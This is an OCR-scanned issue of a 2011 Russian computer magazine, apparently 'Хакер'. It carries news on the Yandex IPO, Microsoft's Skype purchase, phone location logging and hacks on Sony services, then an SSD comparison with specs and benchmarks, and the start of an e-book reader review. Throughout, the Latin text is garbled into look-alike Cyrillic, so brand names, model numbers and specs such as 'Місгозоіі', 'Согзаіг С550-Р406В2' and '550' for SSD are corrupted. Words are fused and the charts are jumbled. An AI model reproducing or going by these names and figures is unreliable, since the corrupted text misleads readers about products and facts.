ходе ІРО «Яндекс» был оценен в 8,03 миллиарда долларов. Акции 
компании были размещены по верхней границе ценового диапазона 
— на уровне $25 за штуку. Впоследствии торги начинались уже с $35 
за акцию. То есть, вся ко мпанияо ценена примернов 11,2 миллиарда 
долларов. «Яндексу» удалось заткнуть за пояс даже социальную сеть 
ЫпкесІІп, вышедшую на ІЧА50А0 неделей раньше. Наши им искрен- 
ние поздравления! 
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МІСК030РТ ПОКУПАЕТ ЗКУРЕ 




Крупнейшей сделкой за всю историю ком- 
пании стала для Місгозоіі покупка сервиса 
ІР-телефонии и видеосвязи Зкуре — «мел- 
комягким» пришлось раскошелиться на 
$8,5 млрд. Напомним, что 5 куре и ранее 



переходил «из рук в руки». Первый раз в 
2005 году, когда Зкуре приобрела компания 
еВау за $2,6 миллиарда, и позже, в 2009 
году, когда пакет акций Зкуре был продан 
консорциуму инвесторов за $1 ,9 миллиарда 
(об этой непростой истории мы рассказы- 
вали подробно]. На данный моментуЗкуре 
170 млн активных пользователей, однако, с 
получением прибыли все равно возникают 
проблемы. 

Сможетли Місгозоіі разрешить их? Возмож- 
но. У ІТ-гиганта большие планы относитель- 
но нового приобретения, к примеру, пла- 
нируется интегрировать поддержку 5 куре 



в ХЬох, Кіпесі и аппараты с ѴѴіпсІоѵѵз РЬопе 
на борту, а также связать с многочислен- 
ными онлайновыми сервисами Місгозоіі. 
Хотелось бы отметить, что панические крики 
«Місгозоіі убьет Зкуре!» вряд ли обоснова- 
ны. Известно, что новый владелец не соби- 
рается прекращать поддержку зіапсі -а Іо пе- 
версии приложения и версий для І_іхих, Мае 
05 и других платформ. Зкуре войдет в состав 
Місгозоіі на правах отдельного подразде- 
ления. Во главе подразделения останется 
нынешний глава 5 куре Тони Бейтс (Топу 
Ваіез]. Словом, поводовдля паники пока 
нет вовсе. 



ПРОДОЛЖЕНИЕ «ШПИОНСКОЙ» ИСТОРИИ 



В прошлом номере 
мы рассказывали о 
неприятной особен- 
ности, обнаруженной 
недавно в устрой- 
ствах компании 
Арріе (іРЬопе и іРаб 
сЗС-модемом] и 
устройствах на базе 
АпбгоісІ. Оказалось, 
что смартфоны следят 
за своими хозяевами, тщательно протоколируя 
координаты своих перемещений в простран- 
стве и сохраняя их в отдельный файл. Особенно 
удручало, что такого рода логи в аппаратах Арріе 



неочищаются месяцами, ато и годами, и по ним 
можно восстановить полную картину пере- 
мещений владельца гаджета за последний, 
скажем, год. Эта история получила продолже- 
ние. Во-первых, представители Арріе и Ооодіе 
официально заявили, что вовсе не собирались 
шпионить за пользователями. Согласно офи- 
циальной версии, компании просто составляют 
базы данных с информацией о сотовых вышках 
и хотспотахѴѴі-Рі. Верим-верим, какже. Во- 
вторых, в Арріе признали, что у системы есть 
недостатки. В частности, она не отключается 
даже тогда, когда пользователь выключил 
поддержку локационных сервисов. Плюс, как 
уже было сказано выше, логи хранятся годами, 



хотя достаточно было бы и последних 7-10 
дней. Эти досадные «упущения» Арріе быстро 
поправила, выпустив обновление для Ю54.3.3. 
Был ограничен объем базы, сбор данных стало 
действительно возможно отключить, и іТипез 
больше не сохраняет резервную копиюлога. На 
этом скандал, в общем-то, поутих, однако Арріе 
и Ооодіе еще долго придется разбираться с его 
последствиями. Против компаний подан целый 
ряд исков от возмущенных граждан. Суммы в 
исках фигурируют немалые, например, две жи- 
тельницы штата Мичиган требуют отОоодІе ком- 
пенсацию в размере 50 миллионов долларов 
и настаивают на полном изъятии из продажи 
аппаратов слокационным функционалом. 



вге ішотіеіі 





ХАКЕРЫ ВСЕГО МИРА ОПОЛЧИЛИСЬ НА 80ИУ 




РІАѴ5ТАТІОІЧ» 

Ыеіѵѵогк 

Похоже, кто-то проклял компанию 5опу. С тех 
пор какЗопу попыталась засудить Джорджа 
«0еоНо1»Хотца за взлом своих консолей, про- 
шло совсем немного времени, но эти месяцы 
стали настоящей черной полосой для япон- 
ского гиганта. На страницах прошлых номеров 
мы уже рассказывали отом, что Хотц призвал 
всех бойкотировать компанию (несмотря нато, 



что конфликт между ним и 5опу разрешился 
миром), чтоанонимусы и хактивисты-одиночки 
собрались мстить за СеоЬоПа и просто «за 
все хорошее». Рассказывали мы отом, что 
был взломан РІауЗіаІіоп ІЧеІѵѵогк, в ходе чего 
произошла крупная утечка данных. 5опу не 
сумела защитить имена, логины, пароли, даты 
рождения, адреса и другую конфиденциальную 
информацию пользователей, а также, возмож- 
но, и данные об их банковских картах. Но зло- 
ключения 5опу на этом не закончились. Стало 
только хуже. На данный момент взломы и атаки 
на различные сервисы компанииуже исчисля- 
ются десятками. Анонимусы, кстати, отрицают 
свою причастность ко всей этой вакханалии и 
утверждают, что указывающие на них свиде- 
тельства можно было элементарно подделать. 
«Что же поломали?» — спросишьты. Во-первых, 
снова подвергся атакам РІауЗіаІіоп ІЧеІѵѵогк. 
Сервис неуспел толком заработать, какснова 
полег— нашлась новая уязвимость, на этот раз 
подкачала страница восстановления логина и 
пароля. Оказалось, что хакеру достаточно знать 
дату рождения и етаіі-адрес, на который за- 



регистрирована учетная запись пользователя, 
чтобы обойти систему генерации одноразовых 
паролей. На моментнаписания этой ново- 
сти, сервис все еще лежит. Во-вторых, путем 
обычной 5С11_-инъекции взломали онлайновый 
магазин канадского отделения Зопу-Егісззоп. 
В-третьих, взломали сайтЗопу ВМС в Греции, а 
затемяпонскийЗопуМизЫарап. Болеетого, во 
время всех этих атак личные данные пользова- 
телей снова попали в руки хакеров! Взломщики 
выложили образцы данных в Сеть (можно по- 
смотреть на іЬеЬаскегпеѵуз.сот ). Складывается 
впечатление, что в каждом сайте и сервисе Зопу 
хакеры сейчас видятлишь новую мишень. В 
компанииже.тем временем, размышляют, а не 
назначитьли вознаграждение за информацию 
о взломщиках, чтобы их было проще ловить. По- 
хоже, Зопу не желаетучиться на своих ошибках 
и не понимает, что таки ми заявлениями лишь 
провоцируетхактивистов всего мира действо- 
вать. Не вознаграждения назначать нужно, а 
менять штат специалистов по безопасности и 
серьезно задуматься о направлении политики 
компании. 
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ХАКЕР 07 /1 50/ 201 1 




ДЖЕЙЛБРЕЙКУ 
ПЕРЕКРЫВАЮТ КИСЛОРОД 




Не все компании отваживаются выступать против джейлбрейка 
своих устройств также открыто и рьяно, как многострадальная Зопу. 
Ведь на примере последней ярко видно, что ни к чему хорошему 
это не приводит. Поэтому производители стараются действовать 
исподволь, более хитро. Так стало известно, что МісгозоіТ отказы- 
вает«взломанным» аппаратам на базе ѴѴіпсІоѵѵз Рбопе 7 в доступе к 
обновлениям. Начиная с последней версии прошивки под кодовым 
номером 7392, выпущенной 3 мая, автоматически проверяется ПО, 
установленное на смартфоне. Если вдруг окажется, что этот софт был 
установлен в обход официального механизма, новая версия прошив- 
ки не будет загружаться на смартфон. Не дремлет и Ооодіе, правда 
«компания Добра» действует не столь категорично. Пока обнаружи- 
лось, что Ооодіе не пускает аппараты, владельцы которых добрались 
до гооі-доступа, в новый кинопрокатный сервис. Пользователи 
просто видят ошибку: «Раііесі Іо ІюісН Іісепзеіюг [название фильма] 
(еггог 49]». Пока это, конечно, мелочи, но за ними может последовать 
настоящая лавина закручивания гаек. 



А НТО, ЕСЛИ НЕ ТОРРЕНТЫ? 

На Западе стремительно набирает популярность сервис ЫеіЗІіх, и 
аналитики уже заговорили о том, что ЫеШіх и его аналоги вполне мо- 
гут погубить торрент-сети. Это отнюдь не мрачное предсказание, так 
как модель, используемая ЫеШіх, напротив, могла бы решить много 
проблем и поумерить вечный батхерт борцов за авторские права. 
Лучше всего картину иллюстрируют цифры: еще в первом квартале 
2010 года прирост новых пользователей ресурса почти удвоился, со- 
ставив 3,3 миллиона против 1 ,7 миллиона в начале года. На сегодня 
абонентскую базу ЫеЛІіх составляютуже 22 800 000 человек, которые 
принесли сервису $706 млн только за первый квартал 201 1 года. А 
секрет та кой популярности прост — абонентская плата, начинаю- 
щаяся со смешных 8 долларов в месяц, удобный и продуманный 
интерфейс и всегда свежие фильмы, сериалы и игры, в отличных 
копиях, без глюков и абсолютно легально. И не нужно рыскать по 
трекерам, мучиться с активацией (если речь об игре] или смотреть 
экран ки. Словом, весь «секрет» заключается в богатейшей фильмо- 
и игротеке и в низкой абонентской плате. Ктомуже, покупать контент 
можно сіРЬопе, іРасІ, ХВох, РІауЗіаІіоп 3 и других девайсов. Хотелось 
бы написать, что со временем таких сервисов обязательно станет 
больше, контент на них будет появляться моментально, люди пред- 
почтут небольшую абонентскую плату и удобство халяве, а копирасты 
наконецуспокоятся и вздохнут с облегчением, но... Ксожалению, 
большинство правообладателей видят «светлое будущее» иначе, и 
им выгоднее утверждать, что качать видео из Сети — страшное пре- 
ступление. Однако иногда все же хочется верить. 
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РЕВВІІЛЛ 



I Александр Михеев 



ДОСТУПНОЕ УСКОРЕНИЕ 

Тестирование 880-накопителей небольшого объема 

о Аббревиатура 380 с каждым днем становится все менее таинственной 
для рядового пользователя. И если еще год назад эти загадочные 
устройства использовались лишь техноманьяками с хорошим 
достатком, то сейчас соотношение цены и производительности 
твердотельных накопителей способно заинтересовать многих. 



$50 — большая флешка? 

Прогноз неизбежного триумфа 550 над ИОО вполне оправдан, ведь 
устройства, содержащие в себе йазб-память (основу любого «твердо- 
тельника»), окружают нас довольно долго. Это и сотовыетелефоны, и 
коммуникаторы, и плееры, и ІЭЭВ-флешки, атакже другие мобильные 
гаджеты . Н еуд и в ител ь н о , что те п е р ь в езде суща я фл е ш - п а м ять п ыта ется 
отнять у Н 00 титул монополиста вхранении информации на ПК. Однако 
обычные «флешки» не в состоянии тягаться с современными жесткими 
дисками, поэтому необходимо было этутехнологию доработать. Таким 
образом на свет появились 550. Несмотря на все сходство с младшими 
братьями, различия налицо. Во-первых, твердотельные накопители 
содержат не один, а несколько чипов йазб-памяти, информация на 
которыхзаписывается поочередно, на манер ПАЮ 0. Для покорения высот 
производительности на печатную плату накопителя нередко уста на в- 
л ива ют отдельную микросхему кэш-памяти. И, наконец, 550 получили 
гораздо более продвинутые контроллеры, нежели те, что используются во 
«флешках». Это обусловлено нетолько гонкой за скоростью, но и другим 
не менее важным моментом — продлением срока службы твердотельного 
накопителя, для чего используются самые разные алгоритмы работы с 
ячейками І\ІАІ\І 0-памяти. 

Жизненный ресурс 

Срокслужбы — один из важнейших вопросов, который мучает пользо- 
вателя перед покупкой 530 в свое личное пользование. Несмотря нато, 
что давно канули в летуте времена, когда информацию на чипе памяти 
можно было переписать всего один раз, І\ІАІ\Ю-память все равно имеет 
свои ограничения. К примеру, у МІ_С-ячеек, наиболее популярных в 
производстве 55Э, жизненный ресурс колеблется около отметки в 1 0000 
циклов чтения/записи, вто время какЗЮ-ячейки способны выдержать в 
десять раз больше. Но последние, ксожалению, обладают вдвое меньшей 
плотностью записи, а 550-накопители на их базе стоят гораздо дороже. 
Для снижения износа ячеексовременные контроллеры используют раз- 
личные алгоритмы равномерной нагрузки, что в несколько раз повышает 
надежность 550. Не зря же производители дают несколько лет гарантии. 

Производительность 

Каквсем известно, удаленные файлы не исчезаютс накопителя, а лишь 
помечаются ОС какудаленные. Эта система прекрасно работала с НОО.у 
которого процесс перезаписи незанимал лишнего времени. С 550 дело 
обстоит по-другому, и связано это с особенностями І\ІАІ\Ю-памяти. Ячейки 
в ней объединены в страницы по 4 Кбайт, а страницы — в блоки по 512 
Кбайт. Поэтому процесс перезаписи у 550 сложнее и дольше, нежели у 
ИОО. Сначала в кэш копируется весь блок в 512 Кбайт, в нем удаляются 
необходимые страницы и записываются новые, после чего весьблоксти- 



ТЕСТОВЫЙ СТЕНД 

ПРОЦЕССОР: Іпіеі Соге І7-975 Ехігете, @ 3466 МГц 
СИСТЕМНАЯ ПЛАТА: АЗІЮ Р6Х580 Ргетіит 
ВИДЕОКАРТА: МѴШІАСеРогсебТ 240 
ОПЕРАТИВНАЯ ПАМЯТЬ: Кіпдз1оп991І5471-002.А00І.Р 
@1333 МГц, 3x2 Гб 

НАКОПИТЕЛЬ: Согзаіг С550-Р1206В2, 120 Гб 
БЛОК ПИТАНИЯ: рзр ерзисш 80 рыз, 900 Вт 
ОС: ѴѴіпсІоѵѵз 7 Максимальная х32 



рается с диска, а на его место копируется блок из кэша. На это у контрол- 
лера «твердотельника» уходит больше времени, чем на запись в пустые 
блоки. Поэтому, когда чистых, ни разу не использовавшихся ячеек на на- 
копителе больше нет, 530 начинает работать заметно медленнее. Самым 
современным решением этой проблемы на сегодняшний деньявляется 
функция ТРІ М, которая должна поддерживаться какОС (ѴѴіпсІоѵѵз 7 или 
ѴѴіпсІоѵѵзЗегѵег 2008], так и самим накопителем. Суть ее состоит в том, что 
данные с чипов памяти стираются сразу при удалении их из «корзины», а 
не остаются до тех пор, пока их не перезапишут новыми. С одной стороны, 
это позволяет 550 нетерять своей производительности, с другой — делает 
совершенно бесполезными все программы по восстановлению данных. 

Методика тестирования 

Для того чтобы хорошенько протестировать 550 и выявить их настоящие 
возможности, мы воспользовалисьтремя проверенными временем 
программами. Первым был тест РСМагкѴапіаде, показавший быстро- 
действие накопителей в обычныхусловиях, вроде загрузки ѴѴіпсІоѵѵз или 
редактирования видео в ѴѴіпсІоѵѵз Моѵіе Макег. Дальше по списку шел 
Ютеіег, с помощью которого определялись скорости чтения и записи, 
сначала последовательные (с блоком 128 Кбайт], потом произвольные (с 
блоком 4 Кбайт]. Он же (на примере нескольких паттернов] смог показать, 
как проявят себя накопители в составе веб-сервера или же файлово- 
го сервера. Наконец, синтетическим тестом АТТ0 Оізк ВепсЬтагк мы 
замеряли производительность при чтении/записи от0,5до8192 Кбайт. 

Для того чтобы 550 был в лучшей форме и на 100% готов к преодолению 
«полосы препятствий», он подвергался низкоуровневому форматиро- 
ванию. То есть информация из ячеекстиралась и больше не отвлекала 
контроллер накопителя лишними операциями перезаписи. И чтобы уж 
точно ничего не занижало показатели производительности, в ВІОЭ’е был 
выставлен режим АСНІ. 



► 016 
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Согзаіг 
С550-Р406В2 



Технические характеристики: 

ФОРМ-ФАКТОР: 2,5 дюйма 
ИНТЕРФЕЙС: 5АТА II 
ТИП ПАМЯТИ: МЮ 
КОНТРОЛЛЕР: ЗапсіРогсе 5Р- 1 200 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 280 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЗАПИСИ: 270 Мб/с 
ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: 1 млн часов 
ОБЪЕМ: 40 Гб 



□ 



Согзаіг С55О-Р406В2 — самый маленький по объему 550-накопитель 
в нашем тесте. Ксчастью, это никак не отразилось на его скоростных 
характеристиках. Он может похвастаться не только достойной скоро- 
стью чтения, но и почти схожей — при записи. Конечно, до заявленных 
производителем «высот» накопитель недотягивает, но это и не страшно. 
Зато радует, что скорости записи и чтения не сильно различаются. В 
связи сэтим стоит отдать должное контроллеру 5апбРогсе 5Р-1200, на 
котором основан 40-гиговый «корсар». Занимательно, что в быстродейс- 
твии он не сильно отстает от старшей модели в линейке, представленной 
в нашемтесте — накопителя СогзаігС55В-Г90СВ2-ВПКТ. Конечно, 
четыре десятка гигабайтобычные НОО имели уже лет десять назад, но 
они не имели той производительности, что наблюдается у 550 Согзаіг 
С550-Р400В2. Несмотря на свой небольшой объем, устройство может 
хорошо послужить в качестве системного диска, заставив ОС работать 
в разы быстрее. Но если 40 Гб — нетвой размер, то никто незапрещает 
купить два Сог5аігС55О-Р406В2 и собрать из них массив РАЮ 0, полу- 
чив нетолько вдвое больший объем, но и теоретически вдвое большую 
скорость. 

+ Хорошие показатели скорости чтения и записи. 

+ Невысокая цена. 

- Скромный объем, из-за чего папке Ргодгат Рііез со временем 
станеточеньтесно. 

- В комплекте нет крепления для 3,5-дюймового отсека. 




Согзаіг 
С55О-Р906В2-ВККТ 



Технические характеристики: 

ФОРМ-ФАКТОР: 2,5 дюйма 
ИНТЕРФЕЙС: 5АТА II 
ТИП ПАМЯТИ: МЮ 
КОНТРОЛЛЕР: ЗапсІРогсе 5Р-1 200 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 285 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЗАПИСИ: 275 Мб/с 
ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: 1 млн часов 
ОБЪЕМ: 90 Гб 



Согзаіг С55О-Г90ОВ2-ВРКТ, каки следовало ожидать, отличается от 
своего младшего брата лишьобъемом. Авот90 Гб информации сзапасом 
хватит и для системы, и для установки разнообразных программ, места 
останется даже для нескольких грузных приложений (например, игр]. Од- 
нако и стоит этот 550 почти в два раза больше. Скорость за эти деньги мы 
получаем даже немного большую, чем у СогзаігС55О-Г40СВ2. Особенно 
хорошо это видно по результатам бенчмарка РСМагк Ѵапіаде. 
Производительность — это замечательно, но что можно сказать о сроке 
службы? За него можно не волноваться, ведь оба «корсара» поддержи- 
ваютТПІМ и, по словам производителя, готовы прослужить тебе миллион 
часов. Так что эти «ребята» скорее устареют морально, чем выйдут из 
строя. Еще один бонус СогзаігС55О-Р90СВ2-ВРКТ, пусть и скромный 

— наличие в коробке крепления для 3,5-дюймового отсека корпуса. 
Практично! В целом, СогзаігС55В-Г90СВ2-ВВКТ отлично подойдет для 
того, чтобы, не раздумывая, поставить на него ОС и не беспокоиться, что 
места хватиттолько избранным программам. 

+ Достаточный объем. 

+ Быстрое чтение и запись: второе место среди тестируемых 
накопителей. 

- Цена пока немного «кусается». 
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Кіпдзіоп 

5ѴП00Е52/64О 

Технические характеристики: 

Форм-фактор: 2,5 дюйма 
Интерфейс: 5АТА II 
Тип памяти: МЮ 
Контроллер:ТозЫЬа Т61Ю1ХВ0 
Заявленная скорость чтения: 230 Мб/с 
Заявленная скорость записи: 180 Мб/с 
Время наработки на отказ: 1 млн часов 
Объем: 64 Гб 

■■■■■■■■□□ 



Порой вскрытие — единственный способ разведать, какой контроллер 
установлен в том или ином 550. В случае с Кіпдзіоп 5ѴР1 00Е52/64В 
главным действующим лицом оказался Т05НІВАТ60В1ХВВ, обеща- 
ющий 230 Мб/слинейного чтения и 180 Мб/с — записи. На деле же, то 
бишь в тестах, вышло еще лучше. Но что касается скорости случайной 
записи, то тут Кі пдзГоп 5ѴР1 00Е52/64В показал худшие результаты 
среди прочихучастников. 

Зато, возможно, тебе придется по вкусу аппаратная поддержка 
1 28-битного шифрования на основе АЕ5. Если верить сайту Кіпдзіоп, 
это означает отсутствие потерь производительности по сравнению с 
программным шифрованием. Таким образом, там, где нужна безо- 
пасность, этот не самый быстрый накопитель должен показать себя с 
лучшей стороны. 

Нельзя упускать из виду и то, что Кіпдзіоп поставляет свои 55Р в двух 
вариациях: просто сам накопитель в пластиковой упаковке, и он же в 
комплекте с кабелем 5АТА, металлическими салазками и особым бо- 
нусом — пластиковым корпусом, в который можно вставить как старый 
2,5-дюймовый ноутбучный Н 00, так и сам Кіпдзіоп 5ѴР1 ООЕ52/640, 
превратив устройство во внешний накопитель с интерфейсом 115В 2.0. 
0 позиции практичности устройству Кіпдзіоп в этом тесте, пожалуй, 
нет равных. 

+ Поддержка аппаратного шифрования. 

+ Свобода выбора при покупке 550. 

- Низкая скорость произвольного чтения. 



ОСТ. 

ОС255О2-2ѴТХ606 

Технические характеристики: 

ФОРМ-ФАКТОР: 2,5 дюйма 
ИНТЕРФЕЙС: 5АТА II 
ТИП ПАМЯТИ: МЕС 
КОНТРОЛЛЕР: 5апсІЕогсе 5Е-1 200 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 285 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЗАПИСИ: 275 Мб/с 
ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: 2 млн часов 
ОБЪЕМ: 60 Гб 



Накопитель 002 0025502-2ѴТХ600 — представитель второго поколения 
линейки Ѵегіех. Первый же Ѵегіех еще можно найти в продаже. Поэтому 
модель прошлого поколения до сих пор продолжает продаваться как 
недорогое решение сзаявленными 230/135 Мб/с последовательного 
чтения и записи соответственно (для накопителя объемом 64 Гб). Это 
отнюдь не плохо, но уже не «торт». Ведь 60-гигабайтный Ѵегіех 2, он же 
герой нашего теста — 002 0025502-2ѴТХ600, по словам производи- 
теля, способен продемонстрировать нетолько 285 Мб/с для линейного 
чтения, но и почти та кую же скорость л и ней ной записи. А именно — 275 
Мб/с. Такихже высоких цифр втесте нам добиться неудалось, но в целом 
по производительности 002 ОО255О2-2ѴТХ6О0 идет вровень с Оогзаіг 
055О-Е9О0В2-ВВКТ. 

Но это еще не конец, ведь нетакдавно 002 анонсировалатретье поко- 
ление 550-линейки Ѵегіех. Новые накопители будутоснованы на базе 
контроллера 5апбЕогсе 5Е-2200, что означаетзавидную скорость в 500 
Мб/с на чтение и запись. Цены на новые накопители пока неизвестны, 
но в любом случае Ѵегіех 2 будет стоить дешевле (из-за того, что моделей 
подобного объема больше не будет, минимум 120 Гб), и поэтому лучше 
подойдет для тех, кто хочет опробовать 55Э на шкуре собственного ком- 
пьютера без значительных денежных вложений. 

+ Вдвое больший ресурс — 2 млн часов. 

+ Почти одинаково высокая скорость чтения и записи. 

+ Крепление для 3,5-дюймового отсека корпуса. 
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Зііісоп Роѵл/ег 
5Р128СВ550Е20525 

Технические характеристики: 

ФОРМ-ФАКТОР: 2,5 дюйма 
ИНТЕРФЕЙС: ЗАТАИ 
ТИП ПАМЯТИ: МЮ 
КОНТРОЛЛЕР: ИМ Г61 6 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 250 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬЗАПИСИ: 230 Мб/с 
ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: п/а 
ОБЪЕМ: 128 Гб 

■■■■■■■■□□ 

Специально для тех, кого смущают цифры 40, 60 и 64, когда речь идет 
об объеме внутреннего накопителя для ПК, мы решили протестировать 
болеетяжеловесный 550. Накопитель Зііісоп Роѵѵег5Р1286В55ОЕ20525 
может похвастаться уже 128 Гб І\ІАІ\Ю-памяти, что даже более чем 
достаточно для создания системного диска и установки всех нужных 
программ. Что называется, поставил — и больше не беспокоишься. 
Однако кое-что все-таки вызвало у нас беспокойство. Несмотря на неод- 
нократную перепроверку, Зііісоп Ро\л/ег5Р128СВ55ПЕ20525 справился 
со случайным чтением хуже, чем сзаписью, что сильно подпортило его 
общие результаты. Зато в последовательном чтении этоттвердотельный 
накопитель продемонстрировал недосягаемый для остальных участ- 
никовтеста результат — 249,99 Мб/с, оправдав заявленный произво- 
дителем показатель. Скорость линейной записи, правда, оказалась на 
одну пятую ниже, однако 202 Мб/с — тоже довольно солидная величина. 
Неутешительными оказались результаты тестов, имитирующих работу в 
настоящихусловиях. Видимо, отразилась скорость случайного чтения. 
Но, несмотря на это, ты все равно почувствуешь большую прибавку про- 
изводительности, заменив на Зііісоп Ро\л/ег5Р1280В55ОЕ2О525 старый 
винчестер своего ноутбука. А объема в 1 28 Гб будетуже вполне достаточ- 
но, чтобы комфортно работатьза лэптопом или десктопом. 

+ Большой объем. 

+ Высокая скорость последовательного чтения. 

- Довольно низкая общая производительность. 



ТгапзсепсІ 

Т5646550255-М 

Технические характеристики: 

ФОРМ-ФАКТОР: 2,5 дюйма 
ИНТЕРФЕЙС: ЗАТАИ 
ТИП ПАМЯТИ: МЕС 
КОНТРОЛЛЕР: ИМ ісгоп ИМ Р6 12 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 240 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬЗАПИСИ: 1 1 0 Мб/с 
ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: 1 млн часов. 

ОБЪЕМ: 64 Гб 

■■■■■■■□□□ 

Последним по списку накопителем в нашем тесте оказался ТгапзсепсІ 
Т5646550255-М. В первую очередь его хочется похвалитьзато, что 
он даже превысил заявленные производителем показатели скорости 
линейного чтения и записи приблизительно на 7 и 9 Мб/с соответствен- 
но. Однако общая производительностьу ТгапзсепсІ Т5646550255-М 
оказалась далеко не на высоте. Это напрямую связано с низкой ско- 
ростью последовательной записи. Среди всех рассмотренных выше 
550 ТгапзсепсІ Т5640550255-М оказался единственным, чья скорость 
записи значительно ниже скорости чтения. Этот показатель не мог не 
повлиять на остальные параметры, но, тем не менее, в другихтестах 
ТгапзсепсІ Т5640550255-М показал, что в редких случаях может дать 
фору накопителям с большей линейной скоростью записи. С остальными 
же параметрами у ТгапзсепсІ Т5640550255-М все в порядке. Шестиде- 
сяти четырех гигабайте лихвой хватит для создания системного диска, 
а жизненный ресурс в один миллион часов позволит не волноваться за 
здоровье нового «ЗЗй-шного» друга. 

Поверхность накопителя сделана из глянцевого пластика, но ни ее, ни 
отпечатков пальцев на ней все равно видно не будет, ведь интерфейс 
ЗАТАИ предполагает использование устройства внутри ПК или лэптопа. 

+ Скорости последовательного чтения и записи выше заявленных. 

- Низкая скорость линейной записи. 
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РЕВВІІЛЛ 



РЕЗУЛЬТАТЫ ТЕСТОВ 




оРСМагк Ѵапіаде, баллы 



Согзаіг С550-Р40ВВ2 
Согзаіг С550-Р906В2-ВККТ 
Кіпдзіоп 5ѴР1 00Е52/646 
0С2 ОС25502-2ѴТХ606 
Зііісоп Роѵѵег 5Р1286В530Е20525 
Тгапзсепб Т5646830253-М 




©ІОшеІег гапбот 4 Кбайт, Мб/с 



Согзаіг С550-Р406В2 
Согзаіг С550-Р906В2-ВШ 
Кіпдзіоп 5ѴР100Е52/646 
ОС2 0С25502-2ѴТХ606 
Зііісоп Роѵѵег 5Р1 28СВ550Е20325 
ТгапзсепсІ Т5646550255-М 




РеасІ 
■ №е 



30 



ѴѴИо І5 ѵѵНо по версии РСМагк Ѵапіаде 



Произвольные чтение и запись не для всех накопителей 
оказались простой задачей 




оІОтеІег Раііегпз, Мб/с 



■ ОаІаЬазе 

■ Рііезегѵег 

■ ѴѴогкзІаІіоп 

■ ѴѴеЬзегѵег 



Согзаіг С330-Р406В2 
Согзаіг С350-Р906В2-ВРКТ 
Кіпдзіоп 5ѴР1 00Е52/646 
ОС20С25502-2ѴТХ606 
Зііісоп Роѵѵег 8Р1286В330Е20525 
ТгапзсепсІ Т5646550253-М 




60 70 



оІОтеІег зедиепііаі 128 Кб, Мб/с 



Согзаіг С550-Р40ВВ2 
Согзаіг С550-Р906В2-ВРКТ 
Кіпдзіоп 8ѴР100Е32/64С 
0С2 ОС25302-2ѴТХ606 
Зііісоп Роѵѵег 5Р1 286В550Е20525 
ТгапзсепсІ Т564655Р255-М 




РеасІ 
■ ѴѴгіІе 



300 



В общем-то, паттерны лишний раз подтвердили то, что уже Вот они — заветные показатели, притягивающие столько 

и так понятно внимания к твердотельным накопителям 




оРСМагк Ѵапіаде, Мб/с 



Согзаіг С550-Р406В2 
Согзаіг С550-Р906В2-ВККТ 
Кіпдзіоп ЗѴР100Е32/646 
ОС20С25502-2ѴТХ606 
Зііісоп Роѵѵег 8Р1286В330Е20525 
ТгапзсепсІ Т3646330253-М 




0.00 50.00 100.00 150.00 200.00 



ѴѴіпеіоѵѵз Ое^епсіег 
багпіпд 

Ітрогііпд Рісіигез Іо ѴѴіпсІоѵѵз РИоІо Ваііегу 

ѴѴіпсІоѵѵз Ѵізіа зіагіир 

Ѵісіео есШіпд ѴѴіпсІоѵѵз Моѵіѳ Макег 

ѴѴіппсІоѵѵз Месііа Сепіег 

Асісііпд тизісіо ѴѴіпсІоѵѵз Месііа Ріауег 

Арріісаііоп Іоасііпд 



250,00 



РСМагк Ѵапіаде наглядно показал не только общую производительность, но и сильные и слабые стороны ББО 



ПОДВОДИМ ИТОГИ 

Итак, пришло время делать выбор. Он не будет очень сложным. Если 
тебе хочется за минимальные деньги почувствовать всю «мощь» твер- 
дотельных накопителей, то следует присмотреться к Согзаіг 0550- 
Р40СВ2. За свою высокую производительность и умеренную цену он 



получает награду «Лучшая покупка». «Выбором редакции»заслужен- 
но становится твердотельный накопитель ОС 2 ОС255О2-2ѴТХ60С. Этот 
550 по скоростным характеристикам делит первую строчку с 0550- 
Р90ОВ2-ВВКТ по производительности, зато обладает ресурсом в 2 млн 
часов безотказной работы, в то время как остальные могут похвастать- 
ся только одним миллионом. ~і~ 
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РЕВВІІЛЛ 



I Николай Арсеньев 



ШІ.ЕР 
ВООК Т7002 

Книга без «чернил» 



Технические 

характеристики 

Дисплей: 7 дюймов, 800x480, 
ЖК, І_ЕО-подсветка 
Память: 4 Гбайт + тісгоЗО (до 
16 Гбайт] 

Интерфейсы: 115В 2.0, 
миниджек 

Текстовые форматы: АІЧ5І, ТХТ, 
РОГ, НТМІ_, 

РВ2, РОВ, ЕРІІВ 
Форматы изображений: ЗР6, 
ОРЕО, ВМР, 6ІЕ 

Видеоформаты: ѴѴМѴ, РМ, АѴІ, 
РМѴВ.36Р, ПѴ, МР4, МРЕЗ, 
МКѴ 



Аудиоформаты: МРЗ, ѴѴМА, 
ПАС, ААС 

Аккумулятор: встроенный, 
литиевый 

Дополнительно: встроенный 
динамик, радио, диктофон, 
видеовыход 

Габариты: 190x120x6 мм 

Вес: 300 г 

Комплект поставки: 115В- 
кабель, сетевой адаптер, 
видеокабель, чехол, наушники 
три книги серии «Вселенная 
Метро 2033» 

Гарантия: 12 месяцев 




ѴѴЕХІ.ЕР.ВООКТ7002 - новый продукт ѴѴЕХІ.ЕК, в котором компания решилась 
на смелый эксперимент, встроив сенсорные клавиши. По сути, мы имеем дело 
не просто с электронной книгой, а скорее - со всеядным медиаплеером. 



Яркий корпус и эффектный 
внешниивид 

ѴѴЕХЕЕР.ВООКТ7002 получился очень ярким устройством — на выбор 
модели всех цветов радуги. Нам досталась модификация с серебрис- 
тым задником и белоснежной лицевой панелью. Корпус книги сделан 
добротно, он составлен из двух частей, которые отлично подогнаны 
